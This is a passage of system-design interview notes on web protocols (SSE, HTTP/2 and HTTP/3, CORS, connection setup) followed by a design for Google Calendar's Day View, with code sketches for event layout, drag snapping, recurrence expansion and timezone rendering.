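  subscribe(channel, handler) {
    if (!this.handlers.has(channel)) this.handlers.set(channel, []);
    this.handlers.get(channel).push(handler);
  }
  publish(channel, message) {
    for (const handler of this.handlers.get(channel) ?? []) handler(message);
  }
}

class SocketServer {
  constructor(name, broker) {
    this.name = name;
    this.broker = broker;
    this.inboxes = new Map(); // clientId -> messages delivered over its socket
    broker.subscribe('room:general', (message) => this.deliverLocally(message));
  }
  connect(clientId) {
    this.inboxes.set(clientId, []);
  }
  // A client message is published, never delivered directly to other servers.
  send(fromClientId, text) {
    this.broker.publish('room:general', { from: fromClientId, text });
  }
  deliverLocally(message) {
    for (const inbox of this.inboxes.values()) inbox.push(message);
  }
}

const broker = new Broker();
const server1 = new SocketServer('server-1', broker);
const server2 = new SocketServer('server-2', broker);
server1.connect('alice');
server2.connect('bob');
server1.send('alice', 'hello');
console.log(server2.inboxes.get('bob'));
```

Each server only knows its own connections; the broker is the only component that sees every instance.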

4. SSE (Server-Sent Events)

SSE is a standard that allows servers to push data to web pages over HTTP.

Unidirectional Flow

Unlike WebSockets, SSE is strictly one-way (Server → Client).

// Client
const eventSource = new EventSource('/notifications');

eventSource.onmessage = (event) => {
  console.log('New notification:', event.data);
};

// Server sends updates whenever available
// data: {"type": "new_message", "count": 5}

Native Advantages

Feature	Benefit
Built on HTTP	Works through most firewalls and proxies without special configuration
Auto-reconnection	Browser automatically tries to reconnect on disconnect
Last-Event-ID	Server can "catch up" on missed messages after reconnect
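On the wire, an SSE message is just a few text fields terminated by a blank line, and catch-up after reconnect is a filter on event IDs. A minimal sketch, assuming numeric, increasing IDs; `formatSseEvent` and `eventsSince` are hypothetical helpers.

```javascript
// Serialize one event in the text/event-stream format.
function formatSseEvent({ id, event, data }) {
  const lines = [];
  if (id !== undefined) lines.push(`id: ${id}`);
  if (event !== undefined) lines.push(`event: ${event}`);
  // Multi-line payloads need one "data:" field per line.
  for (const line of String(data).split('\n')) lines.push(`data: ${line}`);
  return lines.join('\n') + '\n\n';
}

// Events the client missed, given the Last-Event-ID header it sent on reconnect.
function eventsSince(log, lastEventId) {
  const last = Number(lastEventId ?? 0);
  return log.filter((entry) => entry.id > last);
}

const log = [
  { id: 1, data: '{"count":3}' },
  { id: 2, data: '{"count":4}' },
  { id: 3, data: '{"count":5}' },
];
console.log(eventsSince(log, '2').map(formatSseEvent).join(''));
```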

Best Use Case

SSE is the "goldilocks" protocol for:

News feeds
Stock tickers
Social media notifications
Live sports scores

When to use: User doesn't need to talk back to the server in real-time, but needs to see server updates immediately.

5. Quick Comparison Table

Protocol	Statefulness	Browser Caching	Scalability Complexity	Best For
REST	Stateless	Excellent (Native)	Low	CRUD operations, Public APIs
GraphQL	Stateless	Difficult (Requires Library)	Medium	Complex data requirements, Mobile apps
WebSockets	Stateful	None	High (Requires Pub/Sub)	Real-time bidirectional (Chat, Games)
SSE	Stateful	Limited	Medium	Server push notifications

6. Decision Framework for Interviews

Is the data...
│
├─▶ Static or changes infrequently?
│   └─▶ REST (leverage HTTP caching)
│
├─▶ Complex with nested relationships?
│   └─▶ GraphQL (avoid over/under-fetching)
│
├─▶ Real-time AND bidirectional?
│   └─▶ WebSockets (chat, collaboration, games)
│
└─▶ Real-time BUT server-to-client only?
    └─▶ SSE (notifications, feeds, tickers)

7. Deep Dive: HTTP/2 and HTTP/3

Understanding the transport layer is crucial for Senior-level discussions.

HTTP/1.1 Limitations

┌─────────────────────────────────────────────┐
│  Browser (6 connection limit per domain)    │
│                                             │
│  Conn 1: GET /style.css ──────────────────▶ │
│  Conn 2: GET /app.js ─────────────────────▶ │
│  Conn 3: GET /image1.png ─────────────────▶ │
│  Conn 4: GET /image2.png ─────────────────▶ │
│  Conn 5: GET /image3.png ─────────────────▶ │
│  Conn 6: GET /image4.png ─────────────────▶ │
│                                             │
│  image5.png WAITING... (blocked)            │
└─────────────────────────────────────────────┘

Head-of-Line Blocking: Each connection handles one request at a time, so if style.css is slow, it holds its connection and anything queued behind it has to wait.

HTTP/2 Multiplexing

┌─────────────────────────────────────────────┐
│  Single TCP Connection                      │
│                                             │
│  Stream 1: GET /style.css ──┐               │
│  Stream 2: GET /app.js ─────┼───▶ Server    │
│  Stream 3: GET /image1.png ─┤               │
│  Stream 4: GET /image2.png ─┤               │
│  Stream 5: GET /image3.png ─┘               │
│                                             │
│  All requests sent simultaneously!          │
└─────────────────────────────────────────────┘

Key Features:

Binary Framing: Headers and body are split into frames
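Header Compression (HPACK): Cuts repeated header overhead substantially (reductions around 85% are commonly cited)
Server Push: Server can send resources before the client asks (now deprecated in practice; Chrome removed support in 2022)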

HTTP/3 (QUIC)

Built on UDP instead of TCP:

Feature	HTTP/2 (TCP)	HTTP/3 (QUIC)
Connection Setup	TCP + TLS = 2-3 RTT	0-1 RTT (transport and TLS 1.3 handshakes combined; 0-RTT on resumption)
Head-of-Line Blocking	Still exists at TCP level	Eliminated (streams are independent)
Connection Migration	Breaks on IP change	Survives (uses connection ID, not IP)

Mobile Game-Changer: When user switches from WiFi to cellular, HTTP/3 connection survives.

8. CORS: The Security Handshake

Cross-Origin Resource Sharing is the browser's security mechanism for cross-domain requests.

The Preflight Dance

┌──────────┐                           ┌──────────┐
│  Browser │                           │  Server  │
│(app.com) │                           │(api.com) │
└────┬─────┘                           └────┬─────┘
     │                                      │
     │  OPTIONS /api/users                  │
     │  Origin: https://app.com             │
     │  Access-Control-Request-Method: POST │
     │  Access-Control-Request-Headers:     │
     │    Content-Type, Authorization       │
     │─────────────────────────────────────▶│
     │                                      │
     │  204 No Content                      │
     │  Access-Control-Allow-Origin: *      │
     │  Access-Control-Allow-Methods: POST  │
     │  Access-Control-Allow-Headers:       │
     │    Content-Type, Authorization       │
     │  Access-Control-Max-Age: 86400       │
     │◀─────────────────────────────────────│
     │                                      │
     │  POST /api/users (actual request)    │
     │─────────────────────────────────────▶│

When Preflight is Triggered

Request Type	Preflight Required?
`GET` with standard headers	No (Simple Request)
`POST` with `Content-Type: application/json`	Yes
Any request with `Authorization` header	Yes
`PUT`, `DELETE`, `PATCH`	Yes
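The table can be approximated as a predicate. This is a simplified sketch of the Fetch standard's rules (it ignores header value length limits, `Range`, and upload listeners); `needsPreflight` is a hypothetical helper.

```javascript
const SIMPLE_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SAFELISTED_HEADERS = new Set([
  'accept', 'accept-language', 'content-language', 'content-type',
]);
const SIMPLE_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain',
]);

// True when a cross-origin request would trigger an OPTIONS preflight.
function needsPreflight({ method, headers = {} }) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(lower)) return true;
    if (lower === 'content-type') {
      const mime = value.split(';')[0].trim().toLowerCase();
      if (!SIMPLE_CONTENT_TYPES.has(mime)) return true;
    }
  }
  return false;
}

console.log(needsPreflight({ method: 'GET' }));
console.log(needsPreflight({ method: 'POST', headers: { 'Content-Type': 'application/json' } }));
```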

CORS Headers Reference

# Server response headers
Access-Control-Allow-Origin: https://app.com  # Or * for any
Access-Control-Allow-Methods: GET, POST, PUT
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Credentials: true  # For cookies
Access-Control-Max-Age: 86400  # Cache preflight for 24 hours
Access-Control-Expose-Headers: X-Custom-Header  # Expose to JS

The Credentials Trap

// Frontend
fetch('https://api.com/data', {
  credentials: 'include'  // Send cookies
});

// Backend MUST respond with:
// Access-Control-Allow-Credentials: true
// Access-Control-Allow-Origin: https://app.com  (NOT *)

Rule: When credentials: 'include', you cannot use * for origin.
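In practice this means echoing back a specific, allow-listed origin. A minimal sketch, assuming the allow-list is a plain array and `corsHeadersFor` is a hypothetical helper; `Vary: Origin` keeps shared caches from serving one origin's response to another.

```javascript
// Build credentialed CORS headers only for origins on the allow-list.
function corsHeadersFor(requestOrigin, allowedOrigins) {
  if (!allowedOrigins.includes(requestOrigin)) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin, // echo the origin, never "*"
    'Access-Control-Allow-Credentials': 'true',
    Vary: 'Origin',
  };
}

const allowed = ['https://app.com'];
console.log(corsHeadersFor('https://app.com', allowed));
console.log(corsHeadersFor('https://evil.example', allowed));
```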

9. Request Lifecycle: Under the Hood

DNS Resolution

1. Browser checks local cache
2. OS checks /etc/hosts and its cache
3. Query goes to configured DNS resolver (ISP or 8.8.8.8)
4. Resolver checks its cache
5. If miss: Resolver queries root → TLD → authoritative NS in turn (iterative resolution)
6. IP address returned and cached (TTL-based)

TCP Connection Establishment (3-Way Handshake)

Client                    Server
   │                         │
   │─────── SYN ────────────▶│  "I want to connect"
   │                         │
   │◀────── SYN-ACK ─────────│  "OK, I acknowledge"
   │                         │
   │─────── ACK ────────────▶│  "Great, connected!"
   │                         │
   │      Connection Open    │

Time Cost: ~1 RTT (Round Trip Time)

TLS Handshake (HTTPS)

Client                           Server
   │                               │
   │─── ClientHello ──────────────▶│  Supported ciphers, random
   │                               │
   │◀── ServerHello + Certificate ─│  Chosen cipher, cert
   │                               │
   │─── Key Exchange + Finished ──▶│  Pre-master secret
   │                               │
   │◀── Finished ──────────────────│
   │                               │
   │     Encrypted Connection      │

Time Cost: ~2 RTT (TLS 1.2) or ~1 RTT (TLS 1.3)

Total for a new HTTPS connection: 2-3 RTT of setup (TCP + TLS), so 3-4 RTT before the first byte of response data arrives!
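The arithmetic is worth making explicit. This sketch counts round trips only; it ignores DNS, server processing time, and TLS session resumption, and the function names are hypothetical.

```javascript
// Round trips spent before the HTTP request can be sent.
function setupRoundTrips(tlsVersion) {
  const tcp = 1; // SYN / SYN-ACK / ACK
  const tls = tlsVersion === '1.3' ? 1 : 2; // TLS 1.3 saves one round trip
  return tcp + tls;
}

// Approximate time until the first response byte on a cold connection.
function timeToFirstByteMs(rttMs, tlsVersion) {
  const requestResponse = 1; // the HTTP request itself
  return (setupRoundTrips(tlsVersion) + requestResponse) * rttMs;
}

console.log(timeToFirstByteMs(100, '1.2')); // 400
console.log(timeToFirstByteMs(100, '1.3')); // 300
```

On a 100ms mobile link, that is 300-400ms gone before any content arrives, which is why connection reuse matters so much.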

10. Interview Tip

"The protocol choice depends on the data access pattern. For standard CRUD with good caching needs, REST wins. For complex, nested data on mobile, GraphQL reduces round trips. For real-time bidirectional communication, WebSockets are necessary despite the scaling complexity. For simple server-push scenarios, SSE offers the best simplicity-to-functionality ratio. I also consider the transport layer — HTTP/2 for multiplexing, HTTP/3 for mobile users who switch networks. And for cross-origin security, I ensure proper CORS configuration with preflight caching to minimize overhead."

Google Calendar — Day View

Arghya Majumder — Mon, 30 Mar 2026 20:22:57 +0000


Frontend / Backend Split: 40% Backend · 60% Frontend
Google Calendar Day View is frontend-heavy — but the backend is non-trivial. The frontend solves: virtual scrolling a 24-hour grid, drag-and-drop with snapping, overlapping event layout (interval partitioning), and RRULE expansion. The backend solves: ACID event storage, conflict resolution for concurrent edits, and fan-out notifications to shared calendar members. Both sections get full coverage.

1. Problem + Scope

Design the Google Calendar Day View — a time-grid UI that displays all events for a single day, supports creating/editing/deleting events via drag, resize, and click, handles recurring events, and broadcasts real-time updates to shared-calendar collaborators.

In scope: Day view grid, event CRUD, drag & resize, recurring events (RRULE), overlapping event layout, real-time collaboration on shared calendars, all-day events, timezone rendering.

Out of scope: Meeting Room booking, Google Meet integration, calendar migration/import, Google Tasks integration.

2. Assumptions & Scale

Metric	Value
Daily Active Users	500M
Avg events visible in day view	10–20 per user
Peak concurrent users	50M
Event reads (day view load)	3–5 API calls
Peak event writes	10M updates/min → ~167K writes/sec
Event storage per user/year	~10K events × 1KB = 10MB
Total storage	500M × 10MB = 5PB
WebSocket connections (shared calendars)	~5M concurrent

Scale calculation for write path:

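167K writes/sec is more than a single PostgreSQL primary comfortably absorbs, but it is manageable for a PostgreSQL cluster sharded by calendar_id, with read replicas serving day-view reads (replicas scale reads, not writes). No NoSQL needed: events are relational (attendees, calendars, permissions). The fan-out to collaborators (shared calendar update → notify N users) is the harder problem at scale.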

These numbers drive the following decisions: PostgreSQL for ACID event storage, Redis for WebSocket session routing, Kafka for fan-out notifications to shared calendar members.

3. Functional Requirements

Display a 24-hour time grid for a selected date, showing all events for the user
Create events via click-and-drag on the grid
Edit events: drag to move (reschedule), drag edge to resize (change duration)
Delete events
Handle overlapping events — render them side-by-side without overlap
Support recurring events defined by RRULE (daily, weekly, monthly, custom)
Show all-day events in a dedicated strip at the top
Render events from multiple calendars with color coding
Real-time sync: if a collaborator edits a shared event, the other user's view updates within 1 second
Timezone-aware: store in UTC, render in the user's local timezone

4. Non-Functional Requirements

Requirement	Target
Initial load latency	< 500ms (events visible)
Drag & resize frame rate	60 fps (no jank)
Real-time update latency	< 1 second for shared calendars
Availability	99.9%
Consistency	Eventual for real-time; strong for event creation/deletion
Offline	Read-only view from local cache; writes queued

Consistency model:

Domain	Model	Justification
Event CRUD	Strong (PostgreSQL)	Prevents double-booking, attendee confusion
Real-time collaboration	Eventual (WebSocket + Kafka)	1-second delay acceptable; last-write-wins
RRULE expansion	Computed on read	Recurrences are derived — no consistency issue

🧠 Mental Model

Google Calendar Day View has three core flows:

Load flow — user navigates to a date → client fetches events for that day → frontend computes the layout (overlaps, positions, widths) → renders the grid
Edit flow — user drags/resizes/clicks → optimistic UI update locally → API call → server persists → WebSocket broadcasts change to collaborators
Real-time flow — collaborator edits a shared event → Event Service writes to DB → Kafka message → Notification Service → WebSocket push → all connected clients for that calendar receive the update

User navigates to Day View
         │
         ▼
   Fetch /events?date=X
         │
    ┌────┴────────────────────────────┐
    │  LAYOUT ENGINE (client-side)    │
    │  1. Sort events by start time   │
    │  2. Detect overlapping groups   │
    │  3. Assign columns + widths     │
    └────┬────────────────────────────┘
         │
         ▼
   Render 24h grid with positioned events
         │
    User drags event
         │
    ┌────┴──────────────────────────────┐
    │  DRAG ENGINE                      │
    │  1. Snap to 15-min increments     │
    │  2. Optimistic update (local)     │
    │  3. PATCH /events/:id on drop     │
    │  4. WS broadcast to collaborators │
    └───────────────────────────────────┘

⚡ Core Design Principles

Path	Optimized For	Mechanism
Fast Path	Perceived latency	Optimistic UI — event moves instantly on drag; API fires async
Reliable Path	Correctness	If PATCH fails, revert optimistic update + show error toast

5. API Design

Calendar APIs

Method	Path	Description
GET	`/api/v1/events?calendarId=&start=&end=`	Fetch events for a date range. Returns expanded recurrences.
POST	`/api/v1/events`	Create event. Returns event with server-assigned ID (idempotency key in body).
PATCH	`/api/v1/events/:id`	Partial update — move/resize uses this. Supports `start`, `end`, `recurrenceAction`.
DELETE	`/api/v1/events/:id?recurrenceAction=`	Delete single instance or all/future recurrences.
GET	`/api/v1/calendars`	List user's calendars (own + shared). Used to set color coding.

WebSocket

Event	Direction	Payload
`calendar.event.updated`	Server → Client	`{ eventId, calendarId, changes, updatedBy }`
`calendar.event.deleted`	Server → Client	`{ eventId, calendarId, recurrenceAction }`

[!TIP]
Interview tip: The recurrenceAction parameter on PATCH/DELETE is a key design question. Options: THIS (only this instance), THIS_AND_FOLLOWING, ALL. Say: "I expose this as a query parameter because the semantic differs from a normal update — it's modifying the RRULE or creating an exception, not just patching data."

6. End-to-End Flow

6.1 Day View Load

User navigates to Day View for date 2025-03-28.
Client sends GET /api/v1/events?calendarId=primary&start=2025-03-28T00:00Z&end=2025-03-29T00:00Z (a half-open range, so events in the last minute of the day are not missed).
Event Service queries PostgreSQL: fetch base events + any RRULE exceptions that fall on this date. For each recurring event, expand the RRULE server-side and return the occurrence for this day as a concrete event object.
Response arrives (≤ 500ms). Client receives array of event objects, each with id, start, end, title, calendarId.
Layout Engine runs: sorts events by start time → groups overlapping events → assigns each event a column index and a width fraction. A group of 3 overlapping events each gets width = 1/3 of the slot.
Virtual scroll renders only the visible portion of the 24h grid. Events are positioned absolutely using top = (startMinutes / 1440) * gridHeight and height = (durationMinutes / 1440) * gridHeight.
WebSocket connection opens to wss://calendar.google.com/ws?calendarId=primary. Client subscribes to shared calendars.
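The positioning formulas from the render step can be sketched as one function. Assumptions: timestamps are full ISO 8601 strings in UTC, the grid covers exactly 24 hours, and `eventRect` is a hypothetical helper.

```javascript
const MINUTES_PER_DAY = 1440;

// Convert an event's time range into pixel top/height within the day grid.
function eventRect(startIso, endIso, dayStartIso, gridHeight) {
  const dayStart = Date.parse(dayStartIso);
  const startMinutes = (Date.parse(startIso) - dayStart) / 60000;
  const durationMinutes = (Date.parse(endIso) - Date.parse(startIso)) / 60000;
  return {
    top: (startMinutes / MINUTES_PER_DAY) * gridHeight,
    height: (durationMinutes / MINUTES_PER_DAY) * gridHeight,
  };
}

// A 09:00-10:30 meeting on a grid drawn at 1 pixel per minute.
console.log(eventRect(
  '2025-03-28T09:00:00Z',
  '2025-03-28T10:30:00Z',
  '2025-03-28T00:00:00Z',
  1440
));
```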

6.2 Drag & Drop (Move Event)

User starts dragging an event. Client immediately applies optimistic update: the event visually follows the cursor. The original time is saved in memory for rollback.
As the event moves, client snaps the top position to the nearest 15-minute increment (every gridHeight / 96 pixels).
On drag end, client computes the new start/end from the final Y position.
Client sends PATCH /api/v1/events/:id with { start: newStart, end: newEnd }.
Event Service writes to PostgreSQL. If the event is a recurring instance and recurrenceAction=THIS, it creates an exception record (stores the modified occurrence, marks the RRULE to skip this date).
Event Service publishes calendar.event.updated to Kafka topic calendar-events.
Notification Service consumes from Kafka, looks up all WebSocket connections subscribed to this calendarId, and pushes the update.
All collaborators' clients receive the WS event and re-render the event at the new time.
If PATCH fails (network error, conflict): client reverts optimistic update, shows error toast, event snaps back to original position.

6.3 🔄 Complete Lifecycle: Load → Layout → Render → Interact → Sync → Re-render

This is the full end-to-end picture — every phase a request passes through from the moment a user opens the day view to the moment a collaborator sees the update.

Load — User navigates to a date. Client fires GET /events?start=&end=. Event Service queries PostgreSQL, expands RRULE occurrences for this day, returns JSON array.
Layout — Client runs the interval partitioning algorithm: sort → group overlapping events → assign columns → compute width fractions. Pure CPU, no network.
Render — Virtual scroll activates. Only the visible hour range is rendered as DOM nodes. Events are positioned absolutely: top = (startMin/1440) * gridH, height = (durationMin/1440) * gridH.
Interact — User drags an event. DOM mutation (no React re-render) moves the event at 60fps. On drop: snap to nearest 15-min grid, compute new time, fire PATCH /events/:id optimistically.
Sync — Event Service writes to PostgreSQL, publishes calendar.event.updated to Kafka. Notification Service consumes, looks up WebSocket connections for all calendarId subscribers in Redis, pushes the update.
Re-render — Every collaborator's client receives the WS push. Client patches its local event array with the change, re-runs layout for the affected time slot, and re-renders the moved event at the new position.

[!IMPORTANT]
The cycle is: Load once → Layout locally → Render virtually → Interact optimistically → Sync async → Re-render incrementally. No full page reload at any step. Each phase is independent and can fail gracefully without breaking the others.

7. High-Level Architecture

Simple Design

Evolved Design (with Real-Time + Scale)

[!NOTE]
Key Insight: The WebSocket server is stateless fanout — it doesn't store event data. Kafka decouples write path from notification path. Event Service never directly calls WebSocket servers.

8. Data Model

Entity	Storage	Key Columns	Why this store
Event	PostgreSQL	`event_id`, `calendar_id`, `owner_id`, `title`, `start_utc`, `end_utc`, `rrule`, `is_all_day`	ACID — prevents double-booking; relational joins for attendees
Recurrence Exception	PostgreSQL	`event_id`, `original_date`, `new_start_utc`, `new_end_utc`, `is_deleted`	Models RRULE overrides without duplicating base event
Calendar	PostgreSQL	`calendar_id`, `owner_id`, `name`, `color`, `timezone`	Relational — permissions, sharing, color metadata
Calendar Members	PostgreSQL	`calendar_id`, `user_id`, `role` (owner/editor/viewer)	Many-to-many sharing; permission checks at write time
WS Session Map	Redis	`calendarId → [connectionId, ...]`	Ephemeral; TTL = connection lifetime. DB lookup = too slow for fanout
Calendar Metadata Cache	Redis	`userId:calendars → JSON`	TTL = 5min. Avoids DB hit on every day view load

[!NOTE]
Key Insight: Recurring events are stored as a rule + exceptions model (not pre-expanded rows). Expansion happens at read time. Pre-expanding 10 years of weekly events = 520 rows per event × 500M users = storage explosion.

9. Deep Dives

9.1 🧠 Layout Algorithm — Interval Partitioning Problem

Here's the problem we're solving: Multiple events on the same day can have overlapping time ranges. Rendering them stacked (one behind the other) makes them unreadable. We need an algorithm that places overlapping events side-by-side with correct widths so all are visible simultaneously.

This is a classic interval partitioning problem — the same problem as scheduling jobs on the minimum number of machines such that no two overlapping jobs share a machine. The minimum number of machines needed = the maximum number of events overlapping at any single point in time.

Naive solution: Render each event at full width. Overlapping events cover each other — user can't see or click the hidden events.

🧠 Layout Algorithm (Core) — 4 Steps:

Step 1 — Sort events by start time
Sort all events for the day by start_utc ascending. This ensures we process events in chronological order and can greedily assign columns.

Step 2 — Group overlapping events
Scan the sorted list. Maintain a running groupEndTime = max end time seen so far. If the next event's start < groupEndTime, it belongs to the current overlapping group. When start >= groupEndTime, the current group is complete — finalize widths and start a new group.

Step 3 — Assign columns
Within each overlapping group: maintain an array of columns, each tracking the latest end_time of the event placed there. For each event, find the first column where column.endTime <= event.startTime. Place the event there and update the column's end time. If no column fits, add a new column.

Step 4 — Calculate width dynamically
After all events in a group are assigned: width = 1 / totalColumns. left offset = columnIndex / totalColumns. A group of 3 overlapping events each renders at 33% width, placed at 0%, 33%, 66% left.

Complexity: O(n log n) sort + O(n·c) placement where c = max concurrent overlaps. For typical calendars (c ≤ 5), effectively O(n).

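Trade-off accepted: Greedy first-fit over start-sorted events is optimal for interval partitioning: it always uses exactly as many columns as the maximum overlap depth. The cost is in the width rule instead. Every event in a group gets width 1 / totalColumns, so an event that overlaps only one neighbor inside a wide group stays narrow rather than expanding into free columns to its right. For calendar data, where c is small and events are human-scheduled, that is an acceptable simplification.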

[!NOTE]
Key Insight: Event layout is the interval partitioning problem. Minimum columns needed = maximum depth of overlapping events at any point. This is computed entirely client-side in O(n log n) — the backend only returns raw start/end times.
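The four steps can be sketched in one pass over the sorted events. This is a minimal illustration, assuming events carry `start` and `end` as minutes since midnight; `layoutEvents` and the sample IDs are hypothetical.

```javascript
// events: [{ id, start, end }] with start/end as minutes since midnight.
function layoutEvents(events) {
  // Step 1: sort by start time (ties broken by end time).
  const sorted = [...events].sort((a, b) => a.start - b.start || a.end - b.end);
  const placed = [];
  let group = []; // events in the current overlapping group
  let columnEnds = []; // end time of the last event placed in each column
  let groupEnd = -Infinity;

  // Step 4: once a group is complete, every member shares the same width.
  const finalizeGroup = () => {
    const total = columnEnds.length;
    for (const item of group) {
      placed.push({
        id: item.id,
        column: item.column,
        width: 1 / total,
        left: item.column / total,
      });
    }
    group = [];
    columnEnds = [];
  };

  for (const event of sorted) {
    // Step 2: an event starting at or after groupEnd begins a new group.
    if (group.length > 0 && event.start >= groupEnd) finalizeGroup();
    // Step 3: first column whose last event has already ended, else a new one.
    let column = columnEnds.findIndex((end) => end <= event.start);
    if (column === -1) {
      column = columnEnds.length;
      columnEnds.push(event.end);
    } else {
      columnEnds[column] = event.end;
    }
    group.push({ id: event.id, column });
    groupEnd = group.length === 1 ? event.end : Math.max(groupEnd, event.end);
  }
  if (group.length > 0) finalizeGroup();
  return placed;
}

const layout = layoutEvents([
  { id: 'standup', start: 540, end: 600 }, // 09:00-10:00
  { id: 'review', start: 570, end: 630 }, // 09:30-10:30
  { id: 'interview', start: 585, end: 660 }, // 09:45-11:00
  { id: 'lunch', start: 780, end: 840 }, // 13:00-14:00
]);
console.log(layout);
```

The three morning events overlap at 09:45, so they split the slot three ways, while the lunch event sits alone and takes the full width.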

9.2 Drag & Drop with 15-Minute Snapping

Here's the problem we're solving: Drag-and-drop on a continuous pixel grid gives pixel-level precision, but calendar events are scheduled in meaningful increments (15 min, 30 min). Allowing arbitrary placement (e.g., 10:03 AM) creates chaos. We need to snap movement to 15-minute increments in real time, at 60fps.

Naive solution: On each mouse/touch move, compute the time from Y position, round to nearest 15 minutes, re-render the event. Problem: React re-renders on every mousemove event = 60–120 events/sec = performance bottleneck.

Chosen solution — CSS transform + commit-on-drop:

During drag: do not update React state on every mousemove. Instead, directly mutate the DOM element's transform: translateY(px). This bypasses React entirely and runs at 60fps with zero re-renders.
Snap logic runs in the event handler (not in React): snappedY = Math.round(rawY / snapInterval) * snapInterval where snapInterval = gridHeight / 96 (96 = 4 per hour × 24 hours).
On drop: compute the new time from snappedY, then trigger a single React state update + API call.
Optimistic update: React state updates immediately with the new time. API call fires async. If it fails, revert.

Trade-off accepted: Directly mutating the DOM breaks React's virtual DOM contract, because this event's position is "out of sync" during drag. This is acceptable because: (a) it's a known, contained exception; (b) the React state is corrected on drop; (c) the visual result stays at a smooth 60fps, which a React re-render on every mousemove struggles to match.

[!NOTE]
Key Insight: Drag-and-drop at 60fps = decouple visual feedback (DOM mutation) from data update (React state). Commit once on drop, not on every pixel.
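The snap arithmetic itself is independent of the UI framework. The sketch below restates it in Python for clarity; the function names and the clamping to the grid are assumptions added for the example, and the real handler would run in the browser.

```python
import math

SLOTS_PER_DAY = 96  # 4 slots per hour x 24 hours


def snap_y(raw_y, grid_height):
    """Snap a pixel offset to the nearest 15-minute grid line."""
    snap_interval = grid_height / SLOTS_PER_DAY
    # floor(x + 0.5) mirrors JavaScript's Math.round;
    # Python's built-in round() rounds halves to even instead.
    snapped = math.floor(raw_y / snap_interval + 0.5) * snap_interval
    # Assumption: clamp so an event cannot be dropped outside the day grid.
    return min(max(snapped, 0.0), grid_height - snap_interval)


def y_to_minutes(snapped_y, grid_height):
    """Convert a snapped pixel offset to minutes since midnight."""
    return round(snapped_y / grid_height * 24 * 60)
```

With a 1440px grid (one pixel per minute), a drop at y = 608 snaps to 615, which is 10:15 AM.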

9.3 Recurring Events — RRULE Expansion

Here's the problem we're solving: A "weekly team standup every Monday" is one event logically, but needs to appear on every Monday in the day view. How do we store this efficiently and handle edits (change only this occurrence vs. all future ones)?

Naive solution (pre-expand and store): Create one DB row per occurrence. A weekly event for 2 years = 104 rows. Fine for one user. At 500M users with an average of 20 weekly recurring events each, that is 500M × 20 × 52 = 520 billion rows for every year of expansion. Not viable.

Chosen solution — Store rule, expand on read:

Store one row with the RRULE string (RFC 5545 format): e.g., RRULE:FREQ=WEEKLY;BYDAY=MO
On GET /events?start=&end=, the Event Service calls an RRULE library to expand only the occurrences within the requested window. For a day view, this expands at most 1–2 occurrences.
Exceptions (user edits "only this event"): store a row in recurrence_exceptions with original_date + modified fields. The expand logic checks exceptions and overrides the generated occurrence.
"This and following": update the base event's UNTIL to originalDate - 1 day, create a new base event starting from originalDate with the new RRULE. Two rows represent the split.

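Trade-off accepted: Expansion logic lives in the service layer (not the DB), so every day-view load runs the RRULE library. If 50M concurrent users each triggered one day-view load per second, that would be ~50M expansion requests/sec as a worst case. For a single-day window each expansion yields only one or two occurrences per series and takes microseconds, provided the library can seek to the window instead of iterating from the series start. Acceptable.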

[!NOTE]
Key Insight: RRULE is a read-time computation problem, not a storage problem. Store the rule + exceptions. Expand at query time. Pre-expanding = write amplification with no benefit.
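To make "store the rule, expand on read" concrete, here is a hand-rolled sketch for the FREQ=WEEKLY case only. It is a simplified stand-in for a real RFC 5545 library; the `expand_weekly` name, the dictionary shape of an occurrence, and the `exceptions` mapping (keyed by original date) are assumptions for illustration.

```python
from datetime import date, timedelta


def expand_weekly(series_start, window_start, window_end, until=None, exceptions=None):
    """Return occurrences of a weekly series inside [window_start, window_end)."""
    exceptions = exceptions or {}
    # Jump straight to the first occurrence on or after window_start
    # instead of iterating from the start of the series.
    days_behind = max((window_start - series_start).days, 0)
    weeks = -(-days_behind // 7)  # ceiling division
    current = series_start + timedelta(weeks=weeks)

    occurrences = []
    while current < window_end and (until is None or current <= until):
        occurrence = {"original_date": current, "title": "Team standup"}
        # "Only this event" edits override the generated occurrence.
        occurrence.update(exceptions.get(current, {}))
        occurrences.append(occurrence)
        current += timedelta(weeks=1)
    return occurrences
```

A "this and following" split maps onto the `until` argument: the old series gets `until = originalDate - 1 day`, and a second series starts at `originalDate`.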

9.4 Timezone Rendering

Here's the problem we're solving: A user in New York creates an event at 9 AM EST. Their colleague in London views the same shared event. London should see it at 2 PM GMT. The stored time must be unambiguous regardless of who reads it or where.

Solution:

All times stored in UTC in the DB (start_utc, end_utc — TIMESTAMPTZ columns).
Each calendar has a timezone field (IANA timezone string, e.g., America/New_York). Each user also has a profile timezone.
On read: start_utc is returned to the client. The client renders using Intl.DateTimeFormat with the user's local timezone.
The day view renders the grid in the user's timezone, not the event's origin timezone.
For recurring events with DST transitions: the RRULE library handles DST-aware expansion (a "9 AM" weekly event stays at 9 AM local time across DST boundaries, not at a fixed UTC offset).

[!NOTE]
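Key Insight: Store UTC, render local. One-off events need no timezone in the DB; the client handles display. Recurring series are the exception: keeping "9 AM" at 9 AM local across DST requires the series' IANA timezone (the calendar's timezone field) at expansion time, so DST is not purely a display-layer problem.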
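Both halves of this section can be checked with the standard library. The sketch below uses Python's `zoneinfo` in place of the browser's `Intl.DateTimeFormat`; the function names are hypothetical, and it assumes IANA timezone data is available on the host.

```python
from datetime import datetime, timezone
from zoneinfo import ZoneInfo


def render_local(start_utc, viewer_tz):
    """Format a stored UTC instant in the viewer's IANA timezone."""
    return start_utc.astimezone(ZoneInfo(viewer_tz)).strftime("%Y-%m-%d %H:%M")


def local_occurrence_to_utc(year, month, day, hour, series_tz):
    """Resolve a wall-clock time in the series' timezone to a UTC instant."""
    local = datetime(year, month, day, hour, tzinfo=ZoneInfo(series_tz))
    return local.astimezone(timezone.utc)


# One stored instant, two viewers.
stored = datetime(2026, 1, 15, 14, 0, tzinfo=timezone.utc)
new_york_view = render_local(stored, "America/New_York")
london_view = render_local(stored, "Europe/London")

# A weekly 9 AM New York event on either side of the March 2026 DST change.
before_dst = local_occurrence_to_utc(2026, 3, 2, 9, "America/New_York")
after_dst = local_occurrence_to_utc(2026, 3, 9, 9, "America/New_York")
```

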